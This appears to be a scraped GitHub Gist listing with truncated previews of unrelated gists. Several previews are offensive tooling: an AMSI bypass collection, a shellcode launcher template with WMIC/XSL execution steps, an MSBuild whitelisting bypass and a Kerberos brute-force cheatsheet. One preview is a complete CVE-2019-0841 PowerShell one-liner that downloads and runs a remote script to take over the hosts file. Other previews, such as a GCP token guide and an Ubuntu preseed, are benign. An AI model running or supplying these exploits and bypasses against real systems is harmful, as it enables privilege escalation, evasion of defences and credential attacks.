@monoxgas
monoxgas / mscorlib_load_assembly.vba
Last active May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@joeminicucci
joeminicucci / gist:7dd5190dc31c43c518abb489ec77903d
Created September 8, 2019 04:12
VBA AMSI Bypasses (from outflanknl)
'##################################################################################
' Code samples for AMSI bypass techniques
' relating to the blogpost on AMSI bypasses on https://outflank.nl/blog/
'##################################################################################
' ##################################################################################
' AMSI Bypass approach that abuses trusted locations (sample for Word)
' ##################################################################################
@ryu1kn
ryu1kn / README.md
Last active October 28, 2025 17:07
Getting GCP access token from a service account key JSON file

Getting GCP access token from a service account key

Use your service account's key JSON file to get an access token to call Google APIs.

Good for seeing how things work, including the creation of a JWT token.

To create a JWT token, you can replace the create-jwt-token.sh script with tools like step.

If you just want to get an access token for a service account,

@sminez
sminez / get_ippsec_details.py
Last active June 5, 2024 12:10
Find examples of pen testing methods and tools in videos by Ippsec (as of 22nd January 2020)
#!/usr/bin/env python3
"""
Script used to pull down the current video descriptions from ippsec's youtube channel.
The raw output still has a few HTML tags that need to be manually removed and there
also seem to be multiple duplicates of videos that have been removed in the output
saved as ippsec-details.txt
"""
import re
import sys
@0xhexmex
0xhexmex / generic-shellcode-launcher.cs
Last active October 23, 2024 22:27
wmic code execution template
// Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
// Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs
// Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs
// Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll
// mylauncher.js can be put into something like a WMIC XSL template like so...
/*
// wmic-template.xsl
// wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe)
<!-- dotnet.exe msbuild rosylyn_poc.csproj -->
<!-- WDAC/AWL Bypass with Dot Net Core (2.2.x) MSBuild (16.x) and the Roslyn Compiler -->
<Project DefaultTargets="Build">
<UsingTask TaskName="HelloWorld" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
<Task>
<Code Type="Fragment" Language="cs">
<![CDATA[Console.WriteLine($":-) CSHARP :-)");]]>
</Code>
</Task>
</UsingTask>
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@vysecurity
vysecurity / attack-to-csv.py
Last active April 28, 2022 21:44
Get MITRE ATT&CK Framework Techniques by Group in CSV
from stix2 import FileSystemSource
from stix2 import Filter
from stix2.utils import get_type_from_id
fs = FileSystemSource('./enterprise-attack')
def get_group_by_alias(src):
    return src.query([
        Filter('type', '=', 'intrusion-set'),
    ])
@xillwillx
xillwillx / CVE-2019-0841.ps1
Last active June 17, 2020 17:58
CVE-2019-0841 - Overwrite HOST file with "Full Control" permissions given to the user
iex (New-Object net.webclient).downloadstring('https://github.com/FuzzySecurity/PowerShell-Suite/raw/master/Native-HardLink.ps1');start microsoft-edge:;get-process -name MicrosoftEdge | Stop-process;sleep 2;Native-HardLink -Link "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings\settings.dat" -target "$env:windir\system32\drivers\etc\hosts";start microsoft-edge:;get-process -name Microsoftedge | stop-process
@CalvinHartwell
CalvinHartwell / ubuntu-18.04-lts-preseed.cfg
Last active December 10, 2021 19:48
ubuntu-18.04-lts-preseed.cfg
### Preseed for Ubuntu 18.04
# Derived from: https://help.ubuntu.com/lts/installation-guide/example-preseed.txt
### Usage
# We recommend to use the build-iso.sh script to build an image with embedded
# preseed and other required files. In that case the preseed file gets loaded
# automatically and all additional files are available to the installer.
### Unattended Installation
d-i auto-install/enable boolean true